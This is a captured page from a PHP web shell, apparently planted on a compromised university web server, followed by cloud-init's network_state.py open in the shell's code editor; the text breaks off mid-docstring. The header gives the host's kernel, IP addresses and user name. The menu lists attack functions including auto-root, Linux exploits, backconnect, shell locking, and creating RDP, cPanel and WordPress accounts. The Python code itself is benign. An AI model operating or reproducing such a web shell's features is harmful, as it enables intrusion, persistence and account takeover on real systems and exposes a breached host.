Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.138.32.110
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
cloudinit /
net /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
netops
[ DIR ]
drwxr-xr-x
__init__.py
41.92
KB
-rw-r--r--
activators.py
11.65
KB
-rw-r--r--
bsd.py
8.46
KB
-rw-r--r--
cmdline.py
9.13
KB
-rw-r--r--
dhcp.py
35.96
KB
-rw-r--r--
eni.py
20.88
KB
-rw-r--r--
ephemeral.py
21.5
KB
-rw-r--r--
freebsd.py
3.69
KB
-rw-r--r--
netbsd.py
1.41
KB
-rw-r--r--
netplan.py
20.73
KB
-rw-r--r--
network_manager.py
24.66
KB
-rw-r--r--
network_state.py
35.6
KB
-rw-r--r--
networkd.py
12.75
KB
-rw-r--r--
openbsd.py
2.48
KB
-rw-r--r--
renderer.py
1.64
KB
-rw-r--r--
renderers.py
1.78
KB
-rw-r--r--
sysconfig.py
43.97
KB
-rw-r--r--
udev.py
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : network_state.py
# Copyright (C) 2017 Canonical Ltd.
#
# Author: Ryan Harper <ryan.harper@canonical.com>
#
# This file is part of cloud-init. See LICENSE file for license information.

import copy
import functools
import logging
from typing import TYPE_CHECKING, Any, Dict, Optional

from cloudinit import lifecycle, safeyaml, util
from cloudinit.net import (
    find_interface_name_from_mac,
    get_interfaces_by_mac,
    ipv4_mask_to_net_prefix,
    ipv6_mask_to_net_prefix,
    is_ip_network,
    is_ipv4_network,
    is_ipv6_address,
    is_ipv6_network,
    net_prefix_to_ipv4_mask,
)

if TYPE_CHECKING:
    from cloudinit.net.renderer import Renderer

LOG = logging.getLogger(__name__)

NETWORK_STATE_VERSION = 1
# Keys a serialized state must carry, indexed by state version (see load()).
NETWORK_STATE_REQUIRED_KEYS = {
    1: ["version", "config", "network_state"],
}
# v2 device keys that are handled explicitly and therefore must not be
# forwarded as bond/bridge parameters by _handle_bond_bridge().
NETWORK_V2_KEY_FILTER = [
    "addresses",
    "dhcp4",
    "dhcp4-overrides",
    "dhcp6",
    "dhcp6-overrides",
    "gateway4",
    "gateway6",
    "interfaces",
    "match",
    "mtu",
    "nameservers",
    "renderer",
    "set-name",
    "wakeonlan",
    "accept-ra",
    "optional",
]

# v1 parameter name -> v2 parameter name, per device type.  The inverse of
# this table is used to translate v2 bond/bridge parameters back to v1.
NET_CONFIG_TO_V2: Dict[str, Dict[str, Any]] = {
    "bond": {
        "bond-ad-select": "ad-select",
        "bond-arp-interval": "arp-interval",
        "bond-arp-ip-target": "arp-ip-target",
        "bond-arp-validate": "arp-validate",
        "bond-downdelay": "down-delay",
        "bond-fail-over-mac": "fail-over-mac-policy",
        "bond-lacp-rate": "lacp-rate",
        "bond-miimon": "mii-monitor-interval",
        "bond-min-links": "min-links",
        "bond-mode": "mode",
        "bond-num-grat-arp": "gratuitous-arp",
        "bond-primary": "primary",
        "bond-primary-reselect": "primary-reselect-policy",
        "bond-updelay": "up-delay",
        "bond-xmit-hash-policy": "transmit-hash-policy",
    },
    "bridge": {
        "bridge_ageing": "ageing-time",
        "bridge_bridgeprio": "priority",
        "bridge_fd": "forward-delay",
        "bridge_gcint": None,
        "bridge_hello": "hello-time",
        "bridge_maxage": "max-age",
        "bridge_maxwait": None,
        "bridge_pathcost": "path-cost",
        "bridge_portprio": "port-priority",
        "bridge_stp": "stp",
        "bridge_waitport": None,
    },
}


def warn_deprecated_all_devices(dikt: dict) -> None:
    """Warn about deprecations of v2 properties for all devices"""
    if "gateway4" in dikt or "gateway6" in dikt:
        lifecycle.deprecate(
            deprecated="The use of `gateway4` and `gateway6`",
            deprecated_version="22.4",
            extra_message="For more info check out: "
            "https://docs.cloud-init.io/en/latest/topics/network-config-format-v2.html",  # noqa: E501
        )


def diff_keys(expected, actual):
    """Return the set of keys in `expected` that are absent from `actual`."""
    missing = set(expected)
    for key in actual:
        missing.discard(key)
    return missing


class InvalidCommand(Exception):
    """Raised when a command lacks one of its required keys."""


def ensure_command_keys(required_keys):
    """Decorate a handler so it rejects commands missing `required_keys`.

    The wrapped method raises InvalidCommand before the handler body runs
    when any key of `required_keys` is not present in `command`.
    """

    def wrapper(func):
        @functools.wraps(func)
        def decorator(self, command, *args, **kwargs):
            if required_keys:
                missing_keys = diff_keys(required_keys, command)
                if missing_keys:
                    raise InvalidCommand(
                        "Command missing %s of required keys %s"
                        % (missing_keys, required_keys)
                    )
            return func(self, command, *args, **kwargs)

        return decorator

    return wrapper


class NetworkState:
    """Read-only view over a network state dictionary.

    The dictionary handed to the constructor is deep-copied, so later
    changes made by the caller do not leak into this object.
    """

    def __init__(
        self, network_state: dict, version: int = NETWORK_STATE_VERSION
    ):
        self._network_state = copy.deepcopy(network_state)
        self._version = version
        self.use_ipv6 = network_state.get("use_ipv6", False)
        # Computed lazily by the has_default_route property.
        self._has_default_route = None

    @property
    def config(self) -> dict:
        return self._network_state["config"]

    @property
    def version(self):
        return self._version

    @property
    def dns_nameservers(self):
        try:
            return self._network_state["dns"]["nameservers"]
        except KeyError:
            return []

    @property
    def dns_searchdomains(self):
        try:
            return self._network_state["dns"]["search"]
        except KeyError:
            return []

    @property
    def has_default_route(self):
        """Whether any global or per-subnet route is a default route.

        The answer is computed on first access and cached afterwards.
        """
        if self._has_default_route is None:
            self._has_default_route = self._maybe_has_default_route()
        return self._has_default_route

    def iter_interfaces(self, filter_func=None):
        """Yield interface dicts, optionally only those `filter_func` accepts."""
        ifaces = self._network_state.get("interfaces", {})
        for iface in ifaces.values():
            if filter_func is None:
                yield iface
            else:
                if filter_func(iface):
                    yield iface

    def iter_routes(self, filter_func=None):
        """Yield global routes, optionally only those `filter_func` accepts."""
        for route in self._network_state.get("routes", []):
            if filter_func is not None:
                if filter_func(route):
                    yield route
            else:
                yield route

    def _maybe_has_default_route(self):
        # Global routes first, then the routes attached to each subnet.
        for route in self.iter_routes():
            if self._is_default_route(route):
                return True
        for iface in self.iter_interfaces():
            for subnet in iface.get("subnets", []):
                for route in subnet.get("routes", []):
                    if self._is_default_route(route):
                        return True
        return False

    def _is_default_route(self, route):
        default_nets = ("::", "0.0.0.0")
        return (
            route.get("prefix") == 0
            and route.get("network") in default_nets
        )

    @classmethod
    def to_passthrough(cls, network_state: dict) -> "NetworkState":
        """Instantiates a `NetworkState` without interpreting its data.

        That means only `config` and `version` are copied.

        :param network_state: Network state data.
        :return: Instance of `NetworkState`.
        """
        kwargs = {}
        if "version" in network_state:
            kwargs["version"] = network_state["version"]
        return cls({"config": network_state}, **kwargs)


class NetworkStateInterpreter:
    """Translate v1 or v2 network config into a network state dictionary.

    v1 commands are dispatched by their ``type``; v2 sections are
    dispatched by their top-level key and converted to v1 commands first.
    """

    initial_network_state = {
        "interfaces": {},
        "routes": [],
        "dns": {
            "nameservers": [],
            "search": [],
        },
        "use_ipv6": False,
        "config": None,
    }

    def __init__(
        self,
        version=NETWORK_STATE_VERSION,
        config=None,
        renderer: "Optional[Renderer]" = None,
    ):
        self._version = version
        self._config = config
        self._network_state = copy.deepcopy(self.initial_network_state)
        self._network_state["config"] = config
        self._parsed = False
        # interface name -> (nameservers, search), applied once all v1
        # commands have been handled (see parse_config_v1).
        self._interface_dns_map: dict = {}
        self._renderer = renderer
        self.command_handlers = {
            "bond": self.handle_bond,
            "bonds": self.handle_bonds,
            "bridge": self.handle_bridge,
            "bridges": self.handle_bridges,
            "ethernets": self.handle_ethernets,
            "infiniband": self.handle_infiniband,
            "loopback": self.handle_loopback,
            "nameserver": self.handle_nameserver,
            "physical": self.handle_physical,
            "route": self.handle_route,
            "vlan": self.handle_vlan,
            "vlans": self.handle_vlans,
            "wifis": self.handle_wifis,
        }

    @property
    def network_state(self) -> NetworkState:
        """Return the resulting NetworkState.

        For a v2 config rendered by the netplan renderer the raw config is
        passed through uninterpreted.
        """
        from cloudinit.net.netplan import Renderer as NetplanRenderer

        if self._version == 2 and isinstance(self._renderer, NetplanRenderer):
            LOG.debug("Passthrough netplan v2 config")
            return NetworkState.to_passthrough(self._config)
        return NetworkState(self._network_state, version=self._version)

    @property
    def use_ipv6(self):
        return self._network_state.get("use_ipv6")

    @use_ipv6.setter
    def use_ipv6(self, val):
        self._network_state.update({"use_ipv6": val})

    def dump(self):
        """Serialize version, config and network state to a YAML string."""
        state = {
            "version": self._version,
            "config": self._config,
            "network_state": self._network_state,
        }
        return safeyaml.dumps(state)

    def load(self, state):
        """Restore config and network state from a dict shaped like dump().

        :param state: Mapping with "version", "config" and "network_state".
        :raises ValueError: if "version" or another required key is missing.
        :raises KeyError: if the version has no entry in
            NETWORK_STATE_REQUIRED_KEYS.
        """
        if "version" not in state:
            LOG.error("Invalid state, missing version field")
            raise ValueError("Invalid state, missing version field")

        required_keys = NETWORK_STATE_REQUIRED_KEYS[state["version"]]
        missing_keys = diff_keys(required_keys, state)
        if missing_keys:
            msg = "Invalid state, missing keys: %s" % (missing_keys)
            LOG.error(msg)
            raise ValueError(msg)

        # v1 - direct attr mapping, except version.
        # The values live in the underscore-prefixed attributes that dump()
        # reads; `network_state` itself is a getter-only property, so
        # assigning to the public name would raise AttributeError.
        for key in required_keys:
            if key == "version":
                continue
            setattr(self, "_" + key, state[key])

    def dump_network_state(self):
        return safeyaml.dumps(self._network_state)

    def as_dict(self):
        return {"version": self._version, "config": self._config}

    def parse_config(self, skip_broken=True):
        """Parse the stored config with the parser matching its version.

        Versions other than 1 and 2 are ignored and leave the interpreter
        unparsed.
        """
        if self._version == 1:
            self.parse_config_v1(skip_broken=skip_broken)
            self._parsed = True
        elif self._version == 2:
            self.parse_config_v2(skip_broken=skip_broken)
            self._parsed = True

    def parse_config_v1(self, skip_broken=True):
        """Run every v1 command through its handler.

        :param skip_broken: When true, commands raising InvalidCommand are
            logged and skipped instead of aborting the parse.
        :raises RuntimeError: if a command type has no handler.
        :raises ValueError: if a nameserver names an unknown interface.
        """
        for command in self._config:
            command_type = command["type"]
            try:
                handler = self.command_handlers[command_type]
            except KeyError as e:
                raise RuntimeError(
                    "No handler found for command '%s'" % command_type
                ) from e
            try:
                handler(command)
            except InvalidCommand:
                if not skip_broken:
                    raise
                else:
                    LOG.warning(
                        "Skipping invalid command: %s", command, exc_info=True
                    )
                    LOG.debug(self.dump_network_state())
        # Per-interface DNS is applied last so that a nameserver command
        # may precede the interface it refers to.
        for interface, dns in self._interface_dns_map.items():
            iface = None
            try:
                iface = self._network_state["interfaces"][interface]
            except KeyError as e:
                raise ValueError(
                    "Nameserver specified for interface {0}, "
                    "but interface {0} does not exist!".format(interface)
                ) from e
            if iface:
                nameservers, search = dns
                iface["dns"] = {
                    "nameservers": nameservers,
                    "search": search,
                }

    def parse_config_v2(self, skip_broken=True):
        """Run every v2 section through its handler.

        :param skip_broken: When true, sections raising InvalidCommand are
            logged and skipped instead of aborting the parse.
        :raises RuntimeError: if a section has no handler.
        """
        from cloudinit.net.netplan import Renderer as NetplanRenderer

        if isinstance(self._renderer, NetplanRenderer):
            # Nothing to parse as we are going to perform a Netplan passthrough
            return

        for command_type, command in self._config.items():
            if command_type in ["version", "renderer"]:
                continue
            try:
                handler = self.command_handlers[command_type]
            except KeyError as e:
                raise RuntimeError(
                    "No handler found for command '%s'" % command_type
                ) from e
            try:
                handler(command)
                self._v2_common(command)
            except InvalidCommand:
                if not skip_broken:
                    raise
                else:
                    LOG.warning(
                        "Skipping invalid command: %s", command, exc_info=True
                    )
                    LOG.debug(self.dump_network_state())

    @ensure_command_keys(["name"])
    def handle_loopback(self, command):
        return self.handle_physical(command)

    @ensure_command_keys(["name"])
    def handle_physical(self, command):
        """
        command = {
            'type': 'physical',
            'mac_address': 'c0:d6:9f:2c:e8:80',
            'name': 'eth0',
            'subnets': [
                {'type': 'dhcp4'}
            ],
            'accept-ra': 'true'
        }
        """

        interfaces = self._network_state.get("interfaces", {})
        iface = interfaces.get(command["name"], {})
        for param, val in command.get("params", {}).items():
            iface.update({param: val})

        # convert subnet ipv6 netmask to cidr as needed
        subnets = _normalize_subnets(command.get("subnets"))

        # automatically set 'use_ipv6' if any addresses are ipv6
        if not self.use_ipv6:
            for subnet in subnets:
                if subnet.get("type").endswith("6") or is_ipv6_address(
                    subnet.get("address")
                ):
                    self.use_ipv6 = True
                    break

        accept_ra = command.get("accept-ra", None)
        if accept_ra is not None:
            accept_ra = util.is_true(accept_ra)
        wakeonlan = command.get("wakeonlan", None)
        if wakeonlan is not None:
            wakeonlan = util.is_true(wakeonlan)
        optional = command.get("optional", None)
        if optional is not None:
            optional = util.is_true(optional)
        iface.update(
            {
                "config_id": command.get("config_id"),
                "name": command.get("name"),
                "type": command.get("type"),
                "mac_address": command.get("mac_address"),
                "inet": "inet",
                "mode": "manual",
                "mtu": command.get("mtu"),
                "address": None,
                "gateway": None,
                "subnets": subnets,
                "accept-ra": accept_ra,
                "wakeonlan": wakeonlan,
                "optional": optional,
            }
        )
        # v2 entries are keyed by their config id, v1 entries by name.
        iface_key = command.get("config_id", command.get("name"))
        self._network_state["interfaces"].update({iface_key: iface})

    @ensure_command_keys(["name", "vlan_id", "vlan_link"])
    def handle_vlan(self, command):
        """
        auto eth0.222
        iface eth0.222 inet static
                address 10.10.10.1
                netmask 255.255.255.0
                hwaddress ether BC:76:4E:06:96:B3
                vlan-raw-device eth0
        """
        interfaces = self._network_state.get("interfaces", {})
        self.handle_physical(command)
        iface = interfaces.get(command.get("name"), {})
        iface["vlan-raw-device"] = command.get("vlan_link")
        iface["vlan_id"] = command.get("vlan_id")
        interfaces.update({iface["name"]: iface})

    @ensure_command_keys(["name", "bond_interfaces", "params"])
    def handle_bond(self, command):
        """
        #/etc/network/interfaces
        auto eth0
        iface eth0 inet manual
            bond-master bond0
            bond-mode 802.3ad

        auto eth1
        iface eth1 inet manual
            bond-master bond0
            bond-mode 802.3ad

        auto bond0
        iface bond0 inet static
             address 192.168.0.10
             gateway 192.168.0.1
             netmask 255.255.255.0
             bond-slaves none
             bond-mode 802.3ad
             bond-miimon 100
             bond-downdelay 200
             bond-updelay 200
             bond-lacp-rate 4
        """

        self.handle_physical(command)
        interfaces = self._network_state.get("interfaces")
        iface = interfaces.get(command.get("name"), {})
        for param, val in command.get("params").items():
            iface.update({param: val})
        iface.update({"bond-slaves": "none"})
        self._network_state["interfaces"].update({iface["name"]: iface})

        # handle bond slaves
        for ifname in command.get("bond_interfaces"):
            if ifname not in interfaces:
                cmd = {
                    "name": ifname,
                    "type": "bond",
                }
                # inject placeholder
                self.handle_physical(cmd)

            interfaces = self._network_state.get("interfaces", {})
            bond_if = interfaces.get(ifname)
            bond_if["bond-master"] = command.get("name")
            # copy in bond config into slave
            for param, val in command.get("params").items():
                bond_if.update({param: val})
            self._network_state["interfaces"].update({ifname: bond_if})

    @ensure_command_keys(["name", "bridge_interfaces"])
    def handle_bridge(self, command):
        """
            auto br0
            iface br0 inet static
                    address 10.10.10.1
                    netmask 255.255.255.0
                    bridge_ports eth0 eth1
                    bridge_stp off
                    bridge_fd 0
                    bridge_maxwait 0

        bridge_params = [
            "bridge_ports",
            "bridge_ageing",
            "bridge_bridgeprio",
            "bridge_fd",
            "bridge_gcint",
            "bridge_hello",
            "bridge_hw",
            "bridge_maxage",
            "bridge_maxwait",
            "bridge_pathcost",
            "bridge_portprio",
            "bridge_stp",
            "bridge_waitport",
        ]
        """

        # find one of the bridge port ifaces to get mac_addr
        # handle bridge_slaves
        interfaces = self._network_state.get("interfaces", {})
        for ifname in command.get("bridge_interfaces"):
            if ifname in interfaces:
                continue

            cmd = {
                "name": ifname,
            }
            # inject placeholder
            self.handle_physical(cmd)

        interfaces = self._network_state.get("interfaces", {})
        self.handle_physical(command)
        iface = interfaces.get(command.get("name"), {})
        iface["bridge_ports"] = command["bridge_interfaces"]
        for param, val in command.get("params", {}).items():
            iface.update({param: val})

        # convert value to boolean
        bridge_stp = iface.get("bridge_stp")
        if bridge_stp is not None and not isinstance(bridge_stp, bool):
            if bridge_stp in ["on", "1", 1]:
                bridge_stp = True
            elif bridge_stp in ["off", "0", 0]:
                bridge_stp = False
            else:
                raise ValueError(
                    "Cannot convert bridge_stp value ({stp}) to"
                    " boolean".format(stp=bridge_stp)
                )
            iface.update({"bridge_stp": bridge_stp})

        interfaces.update({iface["name"]: iface})

    @ensure_command_keys(["name"])
    def handle_infiniband(self, command):
        self.handle_physical(command)

    def _parse_dns(self, command):
        """Return (nameservers, search) lists from a nameserver command.

        Scalar "address" and "search" values are wrapped into lists.
        """
        nameservers = []
        search = []
        if "address" in command:
            addrs = command["address"]
            if not isinstance(addrs, list):
                addrs = [addrs]
            for addr in addrs:
                nameservers.append(addr)
        if "search" in command:
            paths = command["search"]
            if not isinstance(paths, list):
                paths = [paths]
            for path in paths:
                search.append(path)
        return nameservers, search

    @ensure_command_keys(["address"])
    def handle_nameserver(self, command):
        """Record DNS settings globally, or per interface when one is named."""
        dns = self._network_state.get("dns")
        nameservers, search = self._parse_dns(command)
        if "interface" in command:
            self._interface_dns_map[command["interface"]] = (
                nameservers,
                search,
            )
        else:
            dns["nameservers"].extend(nameservers)
            dns["search"].extend(search)

    @ensure_command_keys(["address"])
    def _handle_individual_nameserver(self, command, iface):
        _iface = self._network_state.get("interfaces")
        nameservers, search = self._parse_dns(command)
        _iface[iface]["dns"] = {"nameservers": nameservers, "search": search}

    @ensure_command_keys(["destination"])
    def handle_route(self, command):
        self._network_state["routes"].append(_normalize_route(command))

    # V2 handlers
    def handle_bonds(self, command):
        """
        v2_command = {
          bond0: {
            'interfaces': ['interface0', 'interface1'],
            'parameters': {
               'mii-monitor-interval': 100,
               'mode': '802.3ad',
               'xmit_hash_policy': 'layer3+4'}},
          bond1: {
            'bond-slaves': ['interface2', 'interface7'],
            'parameters': {
                'mode': 1,
            }
          }
        }

        v1_command = {
            'type': 'bond'
            'name': 'bond0',
            'bond_interfaces': [interface0, interface1],
            'params': {
                'bond-mode': '802.3ad',
                'bond_miimon: 100,
                'bond_xmit_hash_policy': 'layer3+4',
            }
        }

        """
        self._handle_bond_bridge(command, cmd_type="bond")

    def handle_bridges(self, command):
        """
        v2_command = {
          br0: {
            'interfaces': ['interface0', 'interface1'],
            'forward-delay': 0,
            'stp': False,
            'maxwait': 0,
          }
        }

        v1_command = {
            'type': 'bridge'
            'name': 'br0',
            'bridge_interfaces': [interface0, interface1],
            'params': {
                'bridge_stp': 'off',
                'bridge_fd: 0,
                'bridge_maxwait': 0
            }
        }

        """
        self._handle_bond_bridge(command, cmd_type="bridge")

    def handle_ethernets(self, command):
        """
        ethernets:
          eno1:
            match:
              macaddress: 00:11:22:33:44:55
              driver: hv_netvsc
            wakeonlan: true
            dhcp4: true
            dhcp6: false
            addresses:
              - 192.168.14.2/24
              - 2001:1::1/64
            gateway4: 192.168.14.1
            gateway6: 2001:1::2
            nameservers:
              search: [foo.local, bar.local]
              addresses: [8.8.8.8, 8.8.4.4]
          lom:
            match:
              driver: ixgbe
            set-name: lom1
            dhcp6: true
            accept-ra: true
          switchports:
            match:
              name: enp2*
            mtu: 1280

        command = {
            'type': 'physical',
            'mac_address': 'c0:d6:9f:2c:e8:80',
            'name': 'eth0',
            'subnets': [
                {'type': 'dhcp4'}
            ]
        }
        """

        # Get the interfaces by MAC address to update an interface's
        # device name to the name of the device that matches a provided
        # MAC address when the set-name directive is not present.
        #
        # Please see https://bugs.launchpad.net/cloud-init/+bug/1855945
        # for more information.
        ifaces_by_mac = get_interfaces_by_mac()

        for eth, cfg in command.items():
            phy_cmd = {
                "config_id": eth,
                "type": "physical",
            }
            match = cfg.get("match", {})
            mac_address = match.get("macaddress", None)
            if not mac_address:
                LOG.debug(
                    'NetworkState Version2: missing "macaddress" info '
                    "in config entry: %s: %s",
                    eth,
                    str(cfg),
                )
            phy_cmd["mac_address"] = mac_address

            # Determine the name of the interface by using one of the
            # following in the order they are listed:
            #   * set-name
            #   * interface name looked up by mac
            #   * value of "eth" key from this loop
            name = eth
            set_name = cfg.get("set-name")
            if set_name:
                name = set_name
            elif mac_address and ifaces_by_mac:
                lcase_mac_address = mac_address.lower()
                mac = find_interface_name_from_mac(lcase_mac_address)
                if mac:
                    name = mac
            phy_cmd["name"] = name

            driver = match.get("driver", None)
            if driver:
                phy_cmd["params"] = {"driver": driver}
            for key in ["mtu", "match", "wakeonlan", "accept-ra", "optional"]:
                if key in cfg:
                    phy_cmd[key] = cfg[key]

            warn_deprecated_all_devices(cfg)

            subnets = self._v2_to_v1_ipcfg(cfg)
            if len(subnets) > 0:
                phy_cmd.update({"subnets": subnets})

            LOG.debug("v2(ethernets) -> v1(physical):\n%s", phy_cmd)
            self.handle_physical(phy_cmd)

    def handle_vlans(self, command):
        """
        v2_vlans = {
            'eth0.123': {
                'id': 123,
                'link': 'eth0',
                'dhcp4': True,
            }
        }

        v1_command = {
            'type': 'vlan',
            'name': 'eth0.123',
            'vlan_link': 'eth0',
            'vlan_id': 123,
            'subnets': [{'type': 'dhcp4'}],
        }
        """
        for vlan, cfg in command.items():
            vlan_cmd = {
                "type": "vlan",
                "name": vlan,
                "vlan_id": cfg.get("id"),
                "vlan_link": cfg.get("link"),
            }
            if "mtu" in cfg:
                vlan_cmd["mtu"] = cfg["mtu"]
            warn_deprecated_all_devices(cfg)
            subnets = self._v2_to_v1_ipcfg(cfg)
            if len(subnets) > 0:
                vlan_cmd.update({"subnets": subnets})
            LOG.debug("v2(vlans) -> v1(vlan):\n%s", vlan_cmd)
            self.handle_vlan(vlan_cmd)

    def handle_wifis(self, command):
        LOG.warning(
            "Wifi configuration is only available to distros with"
            " netplan rendering support."
        )

    def _v2_common(self, cfg) -> None:
        """Apply per-device "nameservers" settings of a v2 section."""
        LOG.debug("v2_common: handling config:\n%s", cfg)
        for iface, dev_cfg in cfg.items():
            if "nameservers" in dev_cfg:
                search = dev_cfg.get("nameservers").get("search")
                dns = dev_cfg.get("nameservers").get("addresses")
                name_cmd = {"type": "nameserver"}
                if search:
                    name_cmd["search"] = search
                if dns:
                    name_cmd["address"] = dns
                self._handle_individual_nameserver(name_cmd, iface)

    def _handle_bond_bridge(self, command, cmd_type=None):
        """Common handler for bond and bridge types"""

        # inverse mapping for v2 keynames to v1 keynames
        v2key_to_v1 = dict(
            (v, k) for k, v in NET_CONFIG_TO_V2.get(cmd_type).items()
        )

        for item_name, item_cfg in command.items():
            item_params = dict(
                (key, value)
                for (key, value) in item_cfg.items()
                if key not in NETWORK_V2_KEY_FILTER
            )
            # We accept both spellings (as netplan does).  LP: #1756701
            # Normalize internally to the new spelling:
            params = item_params.get("parameters", {})
            grat_value = params.pop("gratuitious-arp", None)
            if grat_value:
                params["gratuitous-arp"] = grat_value

            v1_cmd = {
                "type": cmd_type,
                "name": item_name,
                cmd_type + "_interfaces": item_cfg.get("interfaces"),
                "params": dict((v2key_to_v1[k], v) for k, v in params.items()),
            }
            if "mtu" in item_cfg:
                v1_cmd["mtu"] = item_cfg["mtu"]

            warn_deprecated_all_devices(item_cfg)
            subnets = self._v2_to_v1_ipcfg(item_cfg)
            if len(subnets) > 0:
                v1_cmd.update({"subnets": subnets})

            LOG.debug("v2(%s) -> v1(%s):\n%s", cmd_type, cmd_type, v1_cmd)
            if cmd_type == "bridge":
                self.handle_bridge(v1_cmd)
            elif cmd_type == "bond":
                self.handle_bond(v1_cmd)
            else:
                raise ValueError(
                    "Unknown command type: {cmd_type}".format(
                        cmd_type=cmd_type
                    )
                )

    def _v2_to_v1_ipcfg(self, cfg):
        """Common ipconfig extraction from v2 to v1 subnets array."""

        def _add_dhcp_overrides(overrides, subnet):
            if "route-metric" in overrides:
                subnet["metric"] = overrides["route-metric"]

        subnets = []
        if cfg.get("dhcp4"):
            subnet = {"type": "dhcp4"}
            _add_dhcp_overrides(cfg.get("dhcp4-overrides", {}), subnet)
            subnets.append(subnet)
        if cfg.get("dhcp6"):
            subnet = {"type": "dhcp6"}
            self.use_ipv6 = True
            _add_dhcp_overrides(cfg.get("dhcp6-overrides", {}), subnet)
            subnets.append(subnet)

        # Gateways and nameservers are attached to the first matching
        # static subnet only; these variables remember that it happened.
        gateway4 = None
        gateway6 = None
        nameservers = {}
        for address in cfg.get("addresses", []):
            subnet = {
                "type": "static",
                "address": address,
            }

            if ":" in address:
                if "gateway6" in cfg and gateway6 is None:
                    gateway6 = cfg.get("gateway6")
                    subnet.update({"gateway": gateway6})
            else:
                if "gateway4" in cfg and gateway4 is None:
                    gateway4 = cfg.get("gateway4")
                    subnet.update({"gateway": gateway4})

            if "nameservers" in cfg and not nameservers:
                addresses = cfg.get("nameservers").get("addresses")
                if addresses:
                    nameservers["dns_nameservers"] = addresses
                search = cfg.get("nameservers").get("search")
                if search:
                    nameservers["dns_search"] = search
                subnet.update(nameservers)

            subnets.append(subnet)

        routes = []
        for route in cfg.get("routes", []):
            routes.append(
                _normalize_route(
                    {
                        "destination": route.get("to"),
                        "gateway": route.get("via"),
                        "metric": route.get("metric"),
                        "mtu": route.get("mtu"),
                    }
                )
            )

        # v2 routes are bound to the interface, in v1 we add them under
        # the first subnet since there isn't an equivalent interface level.
        if len(subnets) and len(routes):
            subnets[0]["routes"] = routes

        return subnets


def _normalize_subnet(subnet):
    """Return a normalized copy of `subnet`; the input is left untouched.

    Falsy values are dropped, static subnets get normalized address,
    prefix and netmask keys, routes are normalized, and string-valued
    "dns_search"/"dns_nameservers" entries are split into lists.
    """
    # Prune all keys with None values.
    subnet = copy.deepcopy(subnet)
    normal_subnet = dict((k, v) for k, v in subnet.items() if v)

    if subnet.get("type") in ("static", "static6"):
        normal_subnet.update(
            _normalize_net_keys(
                normal_subnet,
                address_keys=(
                    "address",
                    "ip_address",
                ),
            )
        )
    normal_subnet["routes"] = [
        _normalize_route(r) for r in subnet.get("routes", [])
    ]

    def listify(snet, name):
        if name in snet and not isinstance(snet[name], list):
            snet[name] = snet[name].split()

    for k in ("dns_search", "dns_nameservers"):
        listify(normal_subnet, k)

    return normal_subnet


def _normalize_net_keys(network, address_keys=()):
    """Normalize dictionary network keys returning prefix and address keys.

    @param network: A dict of network-related definition containing prefix,
        netmask and address_keys.
    @param address_keys: A tuple of keys to search for representing the
        address or cidr. The first address_key discovered will be used for
        normalization.

    @returns: A dict containing normalized prefix and matching addr_key.
    """
    net = {k: v for k, v in network.items() if v or v == 0}
    addr_key = None
    for key in address_keys:
        if net.get(key):
            addr_key = key
            break
    if not addr_key:
        message = "No config network address keys [%s] found in %s" % (
            ",".join(address_keys),
            network,
        )
        LOG.error(message)
        raise ValueError(message)

    addr = str(net.get(addr_key))
    if not is_ip_network(addr):
        LOG.error("Address %s is not a valid ip network", addr)
        raise ValueError(f"Address {addr} is not a valid ip address")

    ipv6 = is_ipv6_network(addr)
    ipv4 = is_ipv4_network(addr)

    netmask = net.get("netmask")
    if "/" in addr:
        addr_part, _, maybe_prefix = addr.partition("/")
        net[addr_key] = addr_part
        if ipv6:
            # this supports input of ffff:ffff:ffff::
            prefix = ipv6_mask_to_net_prefix(maybe_prefix)
        elif ipv4:
            # this supports input of 255.255.255.0
            prefix = ipv4_mask_to_net_prefix(maybe_prefix)
        else:
            # In theory this never happens, is_ip_network() should catch all
            # invalid networks
            LOG.error("Address %s is not a valid ip network", addr)
            raise ValueError(f"Address {addr} is not a valid ip address")
    elif "prefix" in net:
        prefix = int(net["prefix"])
    elif netmask and ipv4:
        prefix = ipv4_mask_to_net_prefix(netmask)
    elif netmask and ipv6:
        prefix = ipv6_mask_to_net_prefix(netmask)
    else:
        prefix = 64 if ipv6 else 24

    if "prefix" in net and str(net["prefix"]) != str(prefix):
        LOG.warning(
            "Overwriting existing 'prefix' with '%s' in network info: %s",
            prefix,
            net,
        )
    net["prefix"] = prefix

    if ipv6:
        # TODO: we could/maybe should add this back with the very uncommon
        # 'netmask' for ipv6.  We need a 'net_prefix_to_ipv6_mask' for that.
        if "netmask" in net:
            del net["netmask"]
    elif ipv4:
        net["netmask"] = net_prefix_to_ipv4_mask(net["prefix"])

    return net


def _normalize_route(route):
    """normalize a route.
    return a dictionary with only:
       'type': 'route' (only present if it was present in input)
       'network': the network portion of the route as a string.
       'prefix': the network prefix for address as an integer.
       'metric': integer metric (only if present in input).
       'netmask': netmask (string) equivalent to prefix iff network is ipv4.
    """
    # Prune None-value keys.  Specifically allow 0 (a valid metric).
    normal_route = dict(
        (k, v) for k, v in route.items() if v not in ("", None)
    )
    if "destination" in normal_route:
        normal_route["network"] = normal_route["destination"]
        del normal_route["destination"]

    normal_route.update(
        _normalize_net_keys(
            normal_route, address_keys=("network", "destination")
        )
    )

    metric = normal_route.get("metric")
    if metric:
        try:
            normal_route["metric"] = int(metric)
        except ValueError as e:
            raise TypeError(
                "Route config metric {} is not an integer".format(metric)
            ) from e
    return normal_route


def _normalize_subnets(subnets):
    """Normalize each subnet; a falsy `subnets` yields an empty list."""
    if not subnets:
        subnets = []
    return [_normalize_subnet(s) for s in subnets]


def parse_net_config_data(
    net_config: dict,
    skip_broken: bool = True,
    renderer=None,  # type: Optional[Renderer]
) -> NetworkState:
    """Parses the config, returns NetworkState object

    :param net_config: curtin network config dict
